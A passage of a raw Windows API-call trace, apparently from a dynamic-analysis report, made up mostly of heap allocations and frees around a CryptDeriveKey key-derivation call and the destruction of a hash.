RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac2c0 [0103.375] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a40 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff68 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a10 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391ab8 [0103.375] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cabb0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.375] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a20 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a70 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ad0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2930 [0103.375] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaa8 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b00 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0103.376] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cace8 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.376] PeekMessageW (in: lpMsg=0x144e03c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e03c) returned 0 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2980 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caad8 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab08 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a00 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2a60 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9188 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b20 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac70 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29f0 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0103.376] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e29b0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2990 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a30 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0103.377] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29b0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2980 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a70 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacb8 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b20 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b00 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.377] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a60 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2a80 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xf) returned 0x43cac40 [0103.378] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x43cac40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2990 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ad0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2940 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ae0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2930 [0103.378] CryptDeriveKey (in: hProv=0x41a5250, Algid=0x6610, hBaseData=0x41ac500, dwFlags=0x1, phKey=0x144e070 | out: phKey=0x144e070*=0x41ac000) returned 1 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29f0 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x214) returned 0x43ea958 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797048 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0103.378] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e29c0 [0103.379] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0103.379] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0103.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0103.379] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x1796ee8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0103.379] CryptDestroyHash (hHash=0x41ac500) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae20 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29f0 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafe8 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caf40 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2950 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caef8 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdb0 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a30 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab68 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab50 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa90 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad78 | out: hHeap=0x1780000) returned 1 [0103.379] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab38 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab08 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd60 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae38 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cae80 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e9818 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaa8 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacd0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caca0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac58 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab80 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cace8 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad00 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac70 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac88 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabb0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caac0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caad8 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad30 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad18 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabf8 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad60 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.380] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8cc0 | out: hHeap=0x1780000) returned 1 [0103.381] PeekMessageW (in: lpMsg=0x144e6a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e6a4) returned 0 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a80 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29c0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29b0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabc8 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caaf0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cabe0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff68 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2980 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8d08 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac28 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cad48 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac40 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cacb8 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb030 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caeb0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797048 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea958 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2940 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9b8 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7d8 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe00 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca898 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0170 | out: hHeap=0x1780000) returned 1 [0103.381] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2a50 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff40 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca868 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8c8 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ac0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfd88 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca808 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cff18 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29e0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0198 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2970 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2668 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ab0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2c08 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca910 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca970 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2aa0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0148 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca820 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d00d0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfdd8 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa00 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfe50 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2880 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfec8 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8e0 | out: hHeap=0x1780000) returned 1 [0103.382] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca958 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e29d0 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfea0 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2910 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0120 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7f0 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caa60 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca8b0 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2740 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0103.383] PeekMessageW (in: lpMsg=0x144ebd4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144ebd4) returned 0 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43eab80 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2830 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2730 | out: hHeap=0x1780000) returned 1 [0103.383] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41abfc0 | out: hHeap=0x1780000) returned 1 [0103.383] PeekMessageW 